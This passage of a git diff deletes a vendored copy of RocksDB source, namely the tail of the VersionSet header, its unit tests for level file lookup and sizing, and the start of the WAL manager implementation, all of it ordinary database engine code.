-      const MutableCFOptions& mutable_cf_options, VersionEdit* edit,
-      InstrumentedMutex* mu, Directory* db_directory = nullptr,
-      bool new_descriptor_log = false,
-      const ColumnFamilyOptions* column_family_options = nullptr) {
-    autovector<VersionEdit*> edit_list;
-    edit_list.push_back(edit);
-    return LogAndApply(column_family_data, mutable_cf_options, edit_list, mu,
-                       db_directory, new_descriptor_log, column_family_options);
-  }
-  // The batch version. If edit_list.size() > 1, caller must ensure that
-  // no edit in the list column family add or drop
-  Status LogAndApply(
-      ColumnFamilyData* column_family_data,
-      const MutableCFOptions& mutable_cf_options,
-      const autovector<VersionEdit*>& edit_list, InstrumentedMutex* mu,
-      Directory* db_directory = nullptr, bool new_descriptor_log = false,
-      const ColumnFamilyOptions* column_family_options = nullptr);
-
-  // Recover the last saved descriptor from persistent storage.
-  // If read_only == true, Recover() will not complain if some column families
-  // are not opened
-  Status Recover(const std::vector<ColumnFamilyDescriptor>& column_families,
-                 bool read_only = false);
-
-  // Reads a manifest file and returns a list of column families in
-  // column_families.
-  static Status ListColumnFamilies(std::vector<std::string>* column_families,
-                                   const std::string& dbname, Env* env);
-
-#ifndef ROCKSDB_LITE
-  // Try to reduce the number of levels. This call is valid when
-  // only one level from the new max level to the old
-  // max level containing files.
-  // The call is static, since number of levels is immutable during
-  // the lifetime of a RocksDB instance. It reduces number of levels
-  // in a DB by applying changes to manifest.
-  // For example, a db currently has 7 levels [0-6], and a call to
-  // to reduce to 5 [0-4] can only be executed when only one level
-  // among [4-6] contains files.
-  static Status ReduceNumberOfLevels(const std::string& dbname,
-                                     const Options* options,
-                                     const EnvOptions& env_options,
-                                     int new_levels);
-
-  // printf contents (for debugging)
-  Status DumpManifest(Options& options, std::string& manifestFileName,
-                      bool verbose, bool hex = false, bool json = false);
-
-#endif  // ROCKSDB_LITE
-
-  // Return the current manifest file number
-  uint64_t manifest_file_number() const { return manifest_file_number_; }
-
-  uint64_t options_file_number() const { return options_file_number_; }
-
-  uint64_t pending_manifest_file_number() const {
-    return pending_manifest_file_number_;
-  }
-
-  uint64_t current_next_file_number() const { return next_file_number_.load(); }
-
-  // Allocate and return a new file number
-  uint64_t NewFileNumber() { return next_file_number_.fetch_add(1); }
-
-  // Return the last sequence number.
-  uint64_t LastSequence() const {
-    return last_sequence_.load(std::memory_order_acquire);
-  }
-
-  // Note: memory_order_acquire must be sufficient.
-  uint64_t LastToBeWrittenSequence() const {
-    return last_to_be_written_sequence_.load(std::memory_order_seq_cst);
-  }
-
-  // Set the last sequence number to s.
-  void SetLastSequence(uint64_t s) {
-    assert(s >= last_sequence_);
-    // Last visible seqeunce must always be less than last written seq
-    assert(!db_options_->concurrent_prepare ||
-           s <= last_to_be_written_sequence_);
-    last_sequence_.store(s, std::memory_order_release);
-  }
-
-  // Note: memory_order_release must be sufficient
-  void SetLastToBeWrittenSequence(uint64_t s) {
-    assert(s >= last_to_be_written_sequence_);
-    last_to_be_written_sequence_.store(s, std::memory_order_seq_cst);
-  }
-
-  // Note: memory_order_release must be sufficient
-  uint64_t FetchAddLastToBeWrittenSequence(uint64_t s) {
-    return last_to_be_written_sequence_.fetch_add(s, std::memory_order_seq_cst);
-  }
-
-  // Mark the specified file number as used.
-  // REQUIRED: this is only called during single-threaded recovery
-  void MarkFileNumberUsedDuringRecovery(uint64_t number);
-
-  // Return the log file number for the log file that is currently
-  // being compacted, or zero if there is no such log file.
-  uint64_t prev_log_number() const { return prev_log_number_; }
-
-  // Returns the minimum log number such that all
-  // log numbers less than or equal to it can be deleted
-  uint64_t MinLogNumber() const {
-    uint64_t min_log_num = std::numeric_limits<uint64_t>::max();
-    for (auto cfd : *column_family_set_) {
-      // It's safe to ignore dropped column families here:
-      // cfd->IsDropped() becomes true after the drop is persisted in MANIFEST.
-      if (min_log_num > cfd->GetLogNumber() && !cfd->IsDropped()) {
-        min_log_num = cfd->GetLogNumber();
-      }
-    }
-    return min_log_num;
-  }
-
-  // Create an iterator that reads over the compaction inputs for "*c".
-  // The caller should delete the iterator when no longer needed.
-  InternalIterator* MakeInputIterator(const Compaction* c,
-                                      RangeDelAggregator* range_del_agg);
-
-  // Add all files listed in any live version to *live.
-  void AddLiveFiles(std::vector<FileDescriptor>* live_list);
-
-  // Return the approximate size of data to be scanned for range [start, end)
-  // in levels [start_level, end_level). If end_level == 0 it will search
-  // through all non-empty levels
-  uint64_t ApproximateSize(Version* v, const Slice& start, const Slice& end,
-                           int start_level = 0, int end_level = -1);
-
-  // Return the size of the current manifest file
-  uint64_t manifest_file_size() const { return manifest_file_size_; }
-
-  // verify that the files that we started with for a compaction
-  // still exist in the current version and in the same original level.
-  // This ensures that a concurrent compaction did not erroneously
-  // pick the same files to compact.
-  bool VerifyCompactionFileConsistency(Compaction* c);
-
-  Status GetMetadataForFile(uint64_t number, int* filelevel,
-                            FileMetaData** metadata, ColumnFamilyData** cfd);
-
-  // This function doesn't support leveldb SST filenames
-  void GetLiveFilesMetaData(std::vector<LiveFileMetaData> *metadata);
-
-  void GetObsoleteFiles(std::vector<FileMetaData*>* files,
-                        std::vector<std::string>* manifest_filenames,
-                        uint64_t min_pending_output);
-
-  ColumnFamilySet* GetColumnFamilySet() { return column_family_set_.get(); }
-  const EnvOptions& env_options() { return env_options_; }
-
-  static uint64_t GetNumLiveVersions(Version* dummy_versions);
-
-  static uint64_t GetTotalSstFilesSize(Version* dummy_versions);
-
- private:
-  struct ManifestWriter;
-
-  friend class Version;
-  friend class DBImpl;
-
-  struct LogReporter : public log::Reader::Reporter {
-    Status* status;
-    virtual void Corruption(size_t bytes, const Status& s) override {
-      if (this->status->ok()) *this->status = s;
-    }
-  };
-
-  // ApproximateSize helper
-  uint64_t ApproximateSizeLevel0(Version* v, const LevelFilesBrief& files_brief,
-                                 const Slice& start, const Slice& end);
-
-  uint64_t ApproximateSize(Version* v, const FdWithKeyRange& f,
-                           const Slice& key);
-
-  // Save current contents to *log
-  Status WriteSnapshot(log::Writer* log);
-
-  void AppendVersion(ColumnFamilyData* column_family_data, Version* v);
-
-  ColumnFamilyData* CreateColumnFamily(const ColumnFamilyOptions& cf_options,
-                                       VersionEdit* edit);
-
-  std::unique_ptr<ColumnFamilySet> column_family_set_;
-
-  Env* const env_;
-  const std::string dbname_;
-  const ImmutableDBOptions* const db_options_;
-  std::atomic<uint64_t> next_file_number_;
-  uint64_t manifest_file_number_;
-  uint64_t options_file_number_;
-  uint64_t pending_manifest_file_number_;
-  // The last seq visible to reads
-  std::atomic<uint64_t> last_sequence_;
-  // The last seq with which a writer has written/will write.
-  std::atomic<uint64_t> last_to_be_written_sequence_;
-  uint64_t prev_log_number_;  // 0 or backing store for memtable being compacted
-
-  // Opened lazily
-  unique_ptr<log::Writer> descriptor_log_;
-
-  // generates a increasing version number for every new version
-  uint64_t current_version_number_;
-
-  // Queue of writers to the manifest file
-  std::deque<ManifestWriter*> manifest_writers_;
-
-  // Current size of manifest file
-  uint64_t manifest_file_size_;
-
-  std::vector<FileMetaData*> obsolete_files_;
-  std::vector<std::string> obsolete_manifests_;
-
-  // env options for all reads and writes except compactions
-  const EnvOptions& env_options_;
-
-  // env options used for compactions. This is a copy of
-  // env_options_ but with readaheads set to readahead_compactions_.
-  const EnvOptions env_options_compactions_;
-
-  // No copying allowed
-  VersionSet(const VersionSet&);
-  void operator=(const VersionSet&);
-
-  void LogAndApplyCFHelper(VersionEdit* edit);
-  void LogAndApplyHelper(ColumnFamilyData* cfd, VersionBuilder* b, Version* v,
-                         VersionEdit* edit, InstrumentedMutex* mu);
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/version_set_test.cc b/thirdparty/rocksdb/db/version_set_test.cc
deleted file mode 100644
index 625d459..0000000
--- a/thirdparty/rocksdb/db/version_set_test.cc
+++ /dev/null
@@ -1,458 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/version_set.h"
-#include "util/logging.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class GenerateLevelFilesBriefTest : public testing::Test {
- public:
-  std::vector<FileMetaData*> files_;
-  LevelFilesBrief file_level_;
-  Arena arena_;
-
-  GenerateLevelFilesBriefTest() { }
-
-  ~GenerateLevelFilesBriefTest() {
-    for (size_t i = 0; i < files_.size(); i++) {
-      delete files_[i];
-    }
-  }
-
-  void Add(const char* smallest, const char* largest,
-           SequenceNumber smallest_seq = 100,
-           SequenceNumber largest_seq = 100) {
-    FileMetaData* f = new FileMetaData;
-    f->fd = FileDescriptor(files_.size() + 1, 0, 0);
-    f->smallest = InternalKey(smallest, smallest_seq, kTypeValue);
-    f->largest = InternalKey(largest, largest_seq, kTypeValue);
-    files_.push_back(f);
-  }
-
-  int Compare() {
-    int diff = 0;
-    for (size_t i = 0; i < files_.size(); i++) {
-      if (file_level_.files[i].fd.GetNumber() != files_[i]->fd.GetNumber()) {
-        diff++;
-      }
-    }
-    return diff;
-  }
-};
-
-TEST_F(GenerateLevelFilesBriefTest, Empty) {
-  DoGenerateLevelFilesBrief(&file_level_, files_, &arena_);
-  ASSERT_EQ(0u, file_level_.num_files);
-  ASSERT_EQ(0, Compare());
-}
-
-TEST_F(GenerateLevelFilesBriefTest, Single) {
-  Add("p", "q");
-  DoGenerateLevelFilesBrief(&file_level_, files_, &arena_);
-  ASSERT_EQ(1u, file_level_.num_files);
-  ASSERT_EQ(0, Compare());
-}
-
-TEST_F(GenerateLevelFilesBriefTest, Multiple) {
-  Add("150", "200");
-  Add("200", "250");
-  Add("300", "350");
-  Add("400", "450");
-  DoGenerateLevelFilesBrief(&file_level_, files_, &arena_);
-  ASSERT_EQ(4u, file_level_.num_files);
-  ASSERT_EQ(0, Compare());
-}
-
-class CountingLogger : public Logger {
- public:
-  CountingLogger() : log_count(0) {}
-  using Logger::Logv;
-  virtual void Logv(const char* format, va_list ap) override { log_count++; }
-  int log_count;
-};
-
-Options GetOptionsWithNumLevels(int num_levels,
-                                std::shared_ptr<CountingLogger> logger) {
-  Options opt;
-  opt.num_levels = num_levels;
-  opt.info_log = logger;
-  return opt;
-}
-
-class VersionStorageInfoTest : public testing::Test {
- public:
-  const Comparator* ucmp_;
-  InternalKeyComparator icmp_;
-  std::shared_ptr<CountingLogger> logger_;
-  Options options_;
-  ImmutableCFOptions ioptions_;
-  MutableCFOptions mutable_cf_options_;
-  VersionStorageInfo vstorage_;
-
-  InternalKey GetInternalKey(const char* ukey,
-                             SequenceNumber smallest_seq = 100) {
-    return InternalKey(ukey, smallest_seq, kTypeValue);
-  }
-
-  VersionStorageInfoTest()
-      : ucmp_(BytewiseComparator()),
-        icmp_(ucmp_),
-        logger_(new CountingLogger()),
-        options_(GetOptionsWithNumLevels(6, logger_)),
-        ioptions_(options_),
-        mutable_cf_options_(options_),
-        vstorage_(&icmp_, ucmp_, 6, kCompactionStyleLevel, nullptr, false) {}
-
-  ~VersionStorageInfoTest() {
-    for (int i = 0; i < vstorage_.num_levels(); i++) {
-      for (auto* f : vstorage_.LevelFiles(i)) {
-        if (--f->refs == 0) {
-          delete f;
-        }
-      }
-    }
-  }
-
-  void Add(int level, uint32_t file_number, const char* smallest,
-           const char* largest, uint64_t file_size = 0) {
-    assert(level < vstorage_.num_levels());
-    FileMetaData* f = new FileMetaData;
-    f->fd = FileDescriptor(file_number, 0, file_size);
-    f->smallest = GetInternalKey(smallest, 0);
-    f->largest = GetInternalKey(largest, 0);
-    f->compensated_file_size = file_size;
-    f->refs = 0;
-    f->num_entries = 0;
-    f->num_deletions = 0;
-    vstorage_.AddFile(level, f);
-  }
-};
-
-TEST_F(VersionStorageInfoTest, MaxBytesForLevelStatic) {
-  ioptions_.level_compaction_dynamic_level_bytes = false;
-  mutable_cf_options_.max_bytes_for_level_base = 10;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 5;
-  Add(4, 100U, "1", "2");
-  Add(5, 101U, "1", "2");
-
-  vstorage_.CalculateBaseBytes(ioptions_, mutable_cf_options_);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(1), 10U);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(2), 50U);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(3), 250U);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(4), 1250U);
-
-  ASSERT_EQ(0, logger_->log_count);
-}
-
-TEST_F(VersionStorageInfoTest, MaxBytesForLevelDynamic) {
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-  mutable_cf_options_.max_bytes_for_level_base = 1000;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 5;
-  Add(5, 1U, "1", "2", 500U);
-
-  vstorage_.CalculateBaseBytes(ioptions_, mutable_cf_options_);
-  ASSERT_EQ(0, logger_->log_count);
-  ASSERT_EQ(vstorage_.base_level(), 5);
-
-  Add(5, 2U, "3", "4", 550U);
-  vstorage_.CalculateBaseBytes(ioptions_, mutable_cf_options_);
-  ASSERT_EQ(0, logger_->log_count);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(4), 1000U);
-  ASSERT_EQ(vstorage_.base_level(), 4);
-
-  Add(4, 3U, "3", "4", 550U);
-  vstorage_.CalculateBaseBytes(ioptions_, mutable_cf_options_);
-  ASSERT_EQ(0, logger_->log_count);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(4), 1000U);
-  ASSERT_EQ(vstorage_.base_level(), 4);
-
-  Add(3, 4U, "3", "4", 250U);
-  Add(3, 5U, "5", "7", 300U);
-  vstorage_.CalculateBaseBytes(ioptions_, mutable_cf_options_);
-  ASSERT_EQ(1, logger_->log_count);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(4), 1005U);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(3), 1000U);
-  ASSERT_EQ(vstorage_.base_level(), 3);
-
-  Add(1, 6U, "3", "4", 5U);
-  Add(1, 7U, "8", "9", 5U);
-  logger_->log_count = 0;
-  vstorage_.CalculateBaseBytes(ioptions_, mutable_cf_options_);
-  ASSERT_EQ(1, logger_->log_count);
-  ASSERT_GT(vstorage_.MaxBytesForLevel(4), 1005U);
-  ASSERT_GT(vstorage_.MaxBytesForLevel(3), 1005U);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(2), 1005U);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(1), 1000U);
-  ASSERT_EQ(vstorage_.base_level(), 1);
-}
-
-TEST_F(VersionStorageInfoTest, MaxBytesForLevelDynamicLotsOfData) {
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-  mutable_cf_options_.max_bytes_for_level_base = 100;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 2;
-  Add(0, 1U, "1", "2", 50U);
-  Add(1, 2U, "1", "2", 50U);
-  Add(2, 3U, "1", "2", 500U);
-  Add(3, 4U, "1", "2", 500U);
-  Add(4, 5U, "1", "2", 1700U);
-  Add(5, 6U, "1", "2", 500U);
-
-  vstorage_.CalculateBaseBytes(ioptions_, mutable_cf_options_);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(4), 800U);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(3), 400U);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(2), 200U);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(1), 100U);
-  ASSERT_EQ(vstorage_.base_level(), 1);
-  ASSERT_EQ(0, logger_->log_count);
-}
-
-TEST_F(VersionStorageInfoTest, MaxBytesForLevelDynamicLargeLevel) {
-  uint64_t kOneGB = 1000U * 1000U * 1000U;
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-  mutable_cf_options_.max_bytes_for_level_base = 10U * kOneGB;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-  Add(0, 1U, "1", "2", 50U);
-  Add(3, 4U, "1", "2", 32U * kOneGB);
-  Add(4, 5U, "1", "2", 500U * kOneGB);
-  Add(5, 6U, "1", "2", 3000U * kOneGB);
-
-  vstorage_.CalculateBaseBytes(ioptions_, mutable_cf_options_);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(5), 3000U * kOneGB);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(4), 300U * kOneGB);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(3), 30U * kOneGB);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(2), 10U * kOneGB);
-  ASSERT_EQ(vstorage_.base_level(), 2);
-  ASSERT_EQ(0, logger_->log_count);
-}
-
-TEST_F(VersionStorageInfoTest, EstimateLiveDataSize) {
-  // Test whether the overlaps are detected as expected
-  Add(1, 1U, "4", "7", 1U);  // Perfect overlap with last level
-  Add(2, 2U, "3", "5", 1U);  // Partial overlap with last level
-  Add(2, 3U, "6", "8", 1U);  // Partial overlap with last level
-  Add(3, 4U, "1", "9", 1U);  // Contains range of last level
-  Add(4, 5U, "4", "5", 1U);  // Inside range of last level
-  Add(4, 5U, "6", "7", 1U);  // Inside range of last level
-  Add(5, 6U, "4", "7", 10U);
-  ASSERT_EQ(10U, vstorage_.EstimateLiveDataSize());
-}
-
-TEST_F(VersionStorageInfoTest, EstimateLiveDataSize2) {
-  Add(0, 1U, "9", "9", 1U);  // Level 0 is not ordered
-  Add(0, 1U, "5", "6", 1U);  // Ignored because of [5,6] in l1
-  Add(1, 1U, "1", "2", 1U);  // Ignored because of [2,3] in l2
-  Add(1, 2U, "3", "4", 1U);  // Ignored because of [2,3] in l2
-  Add(1, 3U, "5", "6", 1U);
-  Add(2, 4U, "2", "3", 1U);
-  Add(3, 5U, "7", "8", 1U);
-  ASSERT_EQ(4U, vstorage_.EstimateLiveDataSize());
-}
-
-class FindLevelFileTest : public testing::Test {
- public:
-  LevelFilesBrief file_level_;
-  bool disjoint_sorted_files_;
-  Arena arena_;
-
-  FindLevelFileTest() : disjoint_sorted_files_(true) { }
-
-  ~FindLevelFileTest() {
-  }
-
-  void LevelFileInit(size_t num = 0) {
-    char* mem = arena_.AllocateAligned(num * sizeof(FdWithKeyRange));
-    file_level_.files = new (mem)FdWithKeyRange[num];
-    file_level_.num_files = 0;
-  }
-
-  void Add(const char* smallest, const char* largest,
-           SequenceNumber smallest_seq = 100,
-           SequenceNumber largest_seq = 100) {
-    InternalKey smallest_key = InternalKey(smallest, smallest_seq, kTypeValue);
-    InternalKey largest_key = InternalKey(largest, largest_seq, kTypeValue);
-
-    Slice smallest_slice = smallest_key.Encode();
-    Slice largest_slice = largest_key.Encode();
-
-    char* mem = arena_.AllocateAligned(
-        smallest_slice.size() + largest_slice.size());
-    memcpy(mem, smallest_slice.data(), smallest_slice.size());
-    memcpy(mem + smallest_slice.size(), largest_slice.data(),
-        largest_slice.size());
-
-    // add to file_level_
-    size_t num = file_level_.num_files;
-    auto& file = file_level_.files[num];
-    file.fd = FileDescriptor(num + 1, 0, 0);
-    file.smallest_key = Slice(mem, smallest_slice.size());
-    file.largest_key = Slice(mem + smallest_slice.size(),
-        largest_slice.size());
-    file_level_.num_files++;
-  }
-
-  int Find(const char* key) {
-    InternalKey target(key, 100, kTypeValue);
-    InternalKeyComparator cmp(BytewiseComparator());
-    return FindFile(cmp, file_level_, target.Encode());
-  }
-
-  bool Overlaps(const char* smallest, const char* largest) {
-    InternalKeyComparator cmp(BytewiseComparator());
-    Slice s(smallest != nullptr ? smallest : "");
-    Slice l(largest != nullptr ? largest : "");
-    return SomeFileOverlapsRange(cmp, disjoint_sorted_files_, file_level_,
-                                 (smallest != nullptr ? &s : nullptr),
-                                 (largest != nullptr ? &l : nullptr));
-  }
-};
-
-TEST_F(FindLevelFileTest, LevelEmpty) {
-  LevelFileInit(0);
-
-  ASSERT_EQ(0, Find("foo"));
-  ASSERT_TRUE(! Overlaps("a", "z"));
-  ASSERT_TRUE(! Overlaps(nullptr, "z"));
-  ASSERT_TRUE(! Overlaps("a", nullptr));
-  ASSERT_TRUE(! Overlaps(nullptr, nullptr));
-}
-
-TEST_F(FindLevelFileTest, LevelSingle) {
-  LevelFileInit(1);
-
-  Add("p", "q");
-  ASSERT_EQ(0, Find("a"));
-  ASSERT_EQ(0, Find("p"));
-  ASSERT_EQ(0, Find("p1"));
-  ASSERT_EQ(0, Find("q"));
-  ASSERT_EQ(1, Find("q1"));
-  ASSERT_EQ(1, Find("z"));
-
-  ASSERT_TRUE(! Overlaps("a", "b"));
-  ASSERT_TRUE(! Overlaps("z1", "z2"));
-  ASSERT_TRUE(Overlaps("a", "p"));
-  ASSERT_TRUE(Overlaps("a", "q"));
-  ASSERT_TRUE(Overlaps("a", "z"));
-  ASSERT_TRUE(Overlaps("p", "p1"));
-  ASSERT_TRUE(Overlaps("p", "q"));
-  ASSERT_TRUE(Overlaps("p", "z"));
-  ASSERT_TRUE(Overlaps("p1", "p2"));
-  ASSERT_TRUE(Overlaps("p1", "z"));
-  ASSERT_TRUE(Overlaps("q", "q"));
-  ASSERT_TRUE(Overlaps("q", "q1"));
-
-  ASSERT_TRUE(! Overlaps(nullptr, "j"));
-  ASSERT_TRUE(! Overlaps("r", nullptr));
-  ASSERT_TRUE(Overlaps(nullptr, "p"));
-  ASSERT_TRUE(Overlaps(nullptr, "p1"));
-  ASSERT_TRUE(Overlaps("q", nullptr));
-  ASSERT_TRUE(Overlaps(nullptr, nullptr));
-}
-
-TEST_F(FindLevelFileTest, LevelMultiple) {
-  LevelFileInit(4);
-
-  Add("150", "200");
-  Add("200", "250");
-  Add("300", "350");
-  Add("400", "450");
-  ASSERT_EQ(0, Find("100"));
-  ASSERT_EQ(0, Find("150"));
-  ASSERT_EQ(0, Find("151"));
-  ASSERT_EQ(0, Find("199"));
-  ASSERT_EQ(0, Find("200"));
-  ASSERT_EQ(1, Find("201"));
-  ASSERT_EQ(1, Find("249"));
-  ASSERT_EQ(1, Find("250"));
-  ASSERT_EQ(2, Find("251"));
-  ASSERT_EQ(2, Find("299"));
-  ASSERT_EQ(2, Find("300"));
-  ASSERT_EQ(2, Find("349"));
-  ASSERT_EQ(2, Find("350"));
-  ASSERT_EQ(3, Find("351"));
-  ASSERT_EQ(3, Find("400"));
-  ASSERT_EQ(3, Find("450"));
-  ASSERT_EQ(4, Find("451"));
-
-  ASSERT_TRUE(! Overlaps("100", "149"));
-  ASSERT_TRUE(! Overlaps("251", "299"));
-  ASSERT_TRUE(! Overlaps("451", "500"));
-  ASSERT_TRUE(! Overlaps("351", "399"));
-
-  ASSERT_TRUE(Overlaps("100", "150"));
-  ASSERT_TRUE(Overlaps("100", "200"));
-  ASSERT_TRUE(Overlaps("100", "300"));
-  ASSERT_TRUE(Overlaps("100", "400"));
-  ASSERT_TRUE(Overlaps("100", "500"));
-  ASSERT_TRUE(Overlaps("375", "400"));
-  ASSERT_TRUE(Overlaps("450", "450"));
-  ASSERT_TRUE(Overlaps("450", "500"));
-}
-
-TEST_F(FindLevelFileTest, LevelMultipleNullBoundaries) {
-  LevelFileInit(4);
-
-  Add("150", "200");
-  Add("200", "250");
-  Add("300", "350");
-  Add("400", "450");
-  ASSERT_TRUE(! Overlaps(nullptr, "149"));
-  ASSERT_TRUE(! Overlaps("451", nullptr));
-  ASSERT_TRUE(Overlaps(nullptr, nullptr));
-  ASSERT_TRUE(Overlaps(nullptr, "150"));
-  ASSERT_TRUE(Overlaps(nullptr, "199"));
-  ASSERT_TRUE(Overlaps(nullptr, "200"));
-  ASSERT_TRUE(Overlaps(nullptr, "201"));
-  ASSERT_TRUE(Overlaps(nullptr, "400"));
-  ASSERT_TRUE(Overlaps(nullptr, "800"));
-  ASSERT_TRUE(Overlaps("100", nullptr));
-  ASSERT_TRUE(Overlaps("200", nullptr));
-  ASSERT_TRUE(Overlaps("449", nullptr));
-  ASSERT_TRUE(Overlaps("450", nullptr));
-}
-
-TEST_F(FindLevelFileTest, LevelOverlapSequenceChecks) {
-  LevelFileInit(1);
-
-  Add("200", "200", 5000, 3000);
-  ASSERT_TRUE(! Overlaps("199", "199"));
-  ASSERT_TRUE(! Overlaps("201", "300"));
-  ASSERT_TRUE(Overlaps("200", "200"));
-  ASSERT_TRUE(Overlaps("190", "200"));
-  ASSERT_TRUE(Overlaps("200", "210"));
-}
-
-TEST_F(FindLevelFileTest, LevelOverlappingFiles) {
-  LevelFileInit(2);
-
-  Add("150", "600");
-  Add("400", "500");
-  disjoint_sorted_files_ = false;
-  ASSERT_TRUE(! Overlaps("100", "149"));
-  ASSERT_TRUE(! Overlaps("601", "700"));
-  ASSERT_TRUE(Overlaps("100", "150"));
-  ASSERT_TRUE(Overlaps("100", "200"));
-  ASSERT_TRUE(Overlaps("100", "300"));
-  ASSERT_TRUE(Overlaps("100", "400"));
-  ASSERT_TRUE(Overlaps("100", "500"));
-  ASSERT_TRUE(Overlaps("375", "400"));
-  ASSERT_TRUE(Overlaps("450", "450"));
-  ASSERT_TRUE(Overlaps("450", "500"));
-  ASSERT_TRUE(Overlaps("450", "700"));
-  ASSERT_TRUE(Overlaps("600", "700"));
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/wal_manager.cc b/thirdparty/rocksdb/db/wal_manager.cc
deleted file mode 100644
index 4a9ecbf..0000000
--- a/thirdparty/rocksdb/db/wal_manager.cc
+++ /dev/null
@@ -1,476 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/wal_manager.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <algorithm>
-#include <vector>
-#include <memory>
-
-#include "db/log_reader.h"
-#include "db/log_writer.h"
-#include "db/transaction_log_impl.h"
-#include "db/write_batch_internal.h"
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "rocksdb/write_batch.h"
-#include "util/cast_util.h"
-#include "util/coding.h"
-#include "util/file_reader_writer.h"
-#include "util/filename.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-
-Status WalManager::GetSortedWalFiles(VectorLogPtr& files) {
-  // First get sorted files in db dir, then get sorted files from archived
-  // dir, to avoid a race condition where a log file is moved to archived
-  // dir in between.
-  Status s;
-  // list wal files in main db dir.
-  VectorLogPtr logs;
-  s = GetSortedWalsOfType(db_options_.wal_dir, logs, kAliveLogFile);
-  if (!s.ok()) {
-    return s;
-  }
-
-  // Reproduce the race condition where a log file is moved
-  // to archived dir, between these two sync points, used in
-  // (DBTest,TransactionLogIteratorRace)
-  TEST_SYNC_POINT("WalManager::GetSortedWalFiles:1");
-  TEST_SYNC_POINT("WalManager::GetSortedWalFiles:2");
-
-  files.clear();
-  // list wal files in archive dir.
-  std::string archivedir = ArchivalDirectory(db_options_.wal_dir);
-  Status exists = env_->FileExists(archivedir);
-  if (exists.ok()) {
-    s = GetSortedWalsOfType(archivedir, files, kArchivedLogFile);
-    if (!s.ok()) {
-      return s;
-    }
-  } else if (!exists.IsNotFound()) {
-    assert(s.IsIOError());
-    return s;
-  }
-
-  uint64_t latest_archived_log_number = 0;
-  if (!files.empty()) {
-    latest_archived_log_number = files.back()->LogNumber();
-    ROCKS_LOG_INFO(db_options_.info_log, "Latest Archived log: %" PRIu64,
-                   latest_archived_log_number);
-  }
-
-  files.reserve(files.size() + logs.size());
-  for (auto& log : logs) {
-    if (log->LogNumber() > latest_archived_log_number) {
-      files.push_back(std::move(log));
-    } else {
-      // When the race condition happens, we could see the
-      // same log in both db dir and archived dir. Simply
-      // ignore the one in db dir. Note that, if we read
-      // archived dir first, we would have missed the log file.
-      ROCKS_LOG_WARN(db_options_.info_log, "%s already moved to archive",
-                     log->PathName().c_str());
-    }
-  }
-
-  return s;
-}
-
-Status WalManager::GetUpdatesSince(
-    SequenceNumber seq, std::unique_ptr<TransactionLogIterator>* iter,
-    const TransactionLogIterator::ReadOptions& read_options,
-    VersionSet* version_set) {
-
-  //  Get all sorted Wal Files.
-  //  Do binary search and open files and find the seq number.
-
-  std::unique_ptr<VectorLogPtr> wal_files(new VectorLogPtr);
-  Status s = GetSortedWalFiles(*wal_files);
-  if (!s.ok()) {
-    return s;
-  }
-
-  s = RetainProbableWalFiles(*wal_files, seq);
-  if (!s.ok()) {
-    return s;
-  }
-  iter->reset(new TransactionLogIteratorImpl(
-      db_options_.wal_dir, &db_options_, read_options, env_options_, seq,
-      std::move(wal_files), version_set));
-  return (*iter)->status();
-}
-
-// 1. Go through all archived files and
-//    a. if ttl is enabled, delete outdated files
-//    b. if archive size limit is enabled, delete empty files,
-//        compute file number and size.
-// 2. If size limit is enabled:
-//    a. compute how many files should be deleted
-//    b. get sorted non-empty archived logs
-//    c. delete what should be deleted
-void WalManager::PurgeObsoleteWALFiles() {
-  bool const ttl_enabled = db_options_.wal_ttl_seconds > 0;
-  bool const size_limit_enabled = db_options_.wal_size_limit_mb > 0;
-  if (!ttl_enabled && !size_limit_enabled) {
-    return;
-  }
-
-  int64_t current_time;
-  Status s = env_->GetCurrentTime(&current_time);
